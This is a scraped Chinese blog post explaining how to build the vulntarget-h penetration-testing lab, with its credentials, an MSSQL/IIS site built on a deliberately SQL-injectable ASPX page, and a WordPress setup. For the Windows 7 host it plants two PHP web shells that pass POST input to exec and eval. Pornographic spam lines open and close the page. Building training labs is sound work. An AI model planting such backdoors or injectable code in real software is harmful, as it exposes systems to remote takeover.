美女热舞视频韩国,性感美女直播拍黄色片视频

vulntarget漏洞靶場系列（八）— vulntarget-h

2022.10.24 廣東

vuntarget免責聲明

vulntarget靶場系列僅供安全專業(yè)人員練習滲透測試技術(shù)，此靶場所提供的信息只為網(wǎng)絡(luò)安全人員對自己所負責的網(wǎng)站、服務(wù)器等（包括但不限于）進行檢測或維護參考，未經(jīng)授權(quán)請勿利用靶場中的技術(shù)資料對任何計算機系統(tǒng)進行入侵操作。利用此靶場所提供的信息而造成的直接或間接后果和損失，均由使用者本人負責。

vulntarget靶場系列擁有對此靶場系列的的修改、刪除和解釋權(quán)限，未經(jīng)授權(quán)，不得用于其他。

00

相關(guān)漏洞技術(shù)

sql注入、文件包含、命令執(zhí)行，免殺等漏洞利用、隧道代理等

下載地址

百度云鏈接

https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q

提取碼:1p9p

其中vulntarget-h是本次環(huán)境

github地址：

https://github.com/crow821/vulntarget

測試說明

1. 鏡像都是基于VM16做的，沒有向下兼容
2. 操作人員自行修改對應(yīng)IP
3. 下載靶機，開機之后，確認自己網(wǎng)絡(luò)配置好了，可以選擇本地做一個快照，原本的快照可能會因為制作靶機的處理器和當前打開靶機的處理器不一致，導(dǎo)致快照恢復(fù)失敗，或者異常（見諒）

拓撲圖

01

vulntarget-h賬密

windows10:mimataichangjibuzhu

windows7:mimataichangyebuhao

win2008: Winmimayijingwangjile@

sa:Adminweishenmezhegehaiyaomima@

wordpresss:root:zhehaiyaomima?

此環(huán)境全為windows系統(tǒng)

02

環(huán)境搭建

windows2008

1.windows 2008 mssql安裝

點擊確定

下一步->下一步->安裝->下一步->下一步

到這里全選繼續(xù)下一步->下一步->下一步

對所有用戶使用相同賬戶

輸入管理員賬號密碼

最后改成自動

輸入sa密碼，添加administrator賬戶

添加賬號

然后一直下一步到安裝就好了

2.windows 2008 IIS安裝

控制面板->程序->打開關(guān)閉windows功能->角色->添加角色->下一步

勾選web服務(wù)器(IIS)

勾選上面這些功能->下一步->安裝，等待安裝完成

回到角色點開IIS服務(wù)

點擊網(wǎng)站右鍵選擇website

管理網(wǎng)站->高級設(shè)置

修改網(wǎng)站根目錄

不修改樂趣少一半，防止被攻擊者fuzz出來

直接滾鍵盤，再回到管理網(wǎng)站選擇重新啟動

訪問ip地址看到這樣就可以了

接下來去這里找aspx注入的源碼

https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/SiteGenerator_ContentPages/Vulnerabilities/DataValidation_SqlInjection_Basic.aspx

下載下來后刪掉13行，修改47行的密碼

private static string strSqlConnectionString = @'SERVER=.;UID=sa;PWD=Adminweishenmezhegehaiyaomima@;DATABASE=FoundStone_Bank';

重命名文件后放入網(wǎng)站根目錄

如果放不進去右鍵屬性安全為USER用戶加上修改權(quán)限

訪問頁面存在就可以了，這里肯定報錯因為沒配置數(shù)據(jù)庫

然后去修改首頁，到前面修改網(wǎng)站根目錄的地方

點擊默認文檔

添加index.aspx，這樣再次進入網(wǎng)站就不需要輸index.aspx

到這里找到數(shù)據(jù)庫文件

https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/FoundStoneBank_export.sql

點擊數(shù)據(jù)庫右鍵新建數(shù)據(jù)庫，創(chuàng)建一個名為FoundStone_Bank的數(shù)據(jù)庫

點擊新建查詢復(fù)制配置文件

最后回到首頁用參數(shù)測試一下

這樣就成功了

3.安裝360

這就不寫了

windows7

windows7就是一個windows無回顯的命令執(zhí)行，web目錄不可寫不出網(wǎng)

<?phphighlight_file(__FILE__);exec($_POST['shell']);//路過的腳本小子留下了一個后門，讀一下c:\phpstudy_pro\a.txt吧里面有好東西?>

將這個文件放入網(wǎng)站根目錄

再寫一個shell放到網(wǎng)站根目錄，這個名字取復(fù)雜一點，不要被fuzz出來

開始滾鍵盤

dsuijaddjsfvos.php

<?phphighlight_file(__FILE__);eval($_POST['shell']);?>

設(shè)置網(wǎng)站目錄不可寫，幾個用戶都修改

安裝火絨

windows10

去官網(wǎng)下載wordpress最新版

用phpstudy安裝

創(chuàng)建一個wordpress數(shù)據(jù)庫

然后是常規(guī)的安裝

登錄后臺上傳有漏洞的插件，將網(wǎng)站源碼打包下來改名為www.zip

在組策略編輯->管理模板->網(wǎng)絡(luò)->Lanman工作

啟用不安全的來賓登錄

設(shè)置防火墻，禁止10.30.3.0/24的135，139，445出站

升級windows defender最新版

在phpstudy中關(guān)閉php的遠程包含和遠程文件

這樣就可以簡簡單單的把vulntarget-h制作完成了

本站僅提供存儲服務(wù)，所有內(nèi)容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請點擊舉報。

打開APP，閱讀全文并永久保存查看更多類似文章

Redis未授權(quán)訪問漏洞復(fù)現(xiàn)與GETSHELL利用方法匯總（含靶場搭建）

從零開始學黑客新手入門

Windows2003服務(wù)器安裝及設(shè)置教程——軟件安裝與設(shè)置篇九

Microsoft Windows Server 2008 R2 IIS7.5安裝指南

計算機的系統(tǒng)安全論文

【2018 網(wǎng)絡(luò)空間安全答案】【混戰(zhàn)部分】2018年全國職業(yè)院校技能大賽中職組

更多類似文章 >>

国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看